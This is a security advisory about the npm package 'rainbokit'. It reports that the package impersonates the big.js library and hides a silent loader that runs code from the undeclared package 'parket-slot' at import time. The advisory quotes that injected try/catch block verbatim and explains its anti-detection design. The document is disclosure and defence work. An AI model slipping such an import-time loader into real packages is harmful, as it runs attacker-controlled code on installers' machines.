MAL-2026-6339

Malicious code in rainbokit (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (692bd458c1417d7b87761cfa62e666685cb8d2ebf605b54de3ef8ad5dd993555)

The package publishes as `rainbokit` but ships a verbatim copy of the legitimate `big.js` library (matching author, repository URL, README, LICENCE, and keywords) so that an installer inspecting the on-disk package cannot distinguish it from genuine big.js. Both `big.js` (~line 488) and `big.mjs` contain an injected block `try { const doc = require("parket-slot"); doc.from_str().then(e => { }).catch(e => { }) } catch (error) { }` inserted into the middle of the otherwise-unmodified big.js source. When a consumer does `require('rainbokit')` or `import 'rainbokit'`, this block runs `parket-slot.from_str()`, code controlled by the attacker. The require is wrapped in an empty try/catch and the resulting promise's rejection handler is also empty, so any error is silently swallowed (anti-detection). `parket-slot` is not declared in `dependencies`; the only declared dependency is `log-taker@^0.0.9`, which is never referenced from the visible code. This declared-but-unused / used-but-undeclared split is consistent with a multi-package staging campaign where the attacker resolves `parket-slot` and `log-taker` from sibling packages they control. The combination of identity spoofing of a popular package, a hidden second-stage loader fired at import time, and silent error suppression demonstrates intent to execute attacker-controlled code on installer machines.


Affected packages

npm / rainbokit

No fixed version published yet for rainbokit (npm). Pin to a known-safe version or switch to an alternative.
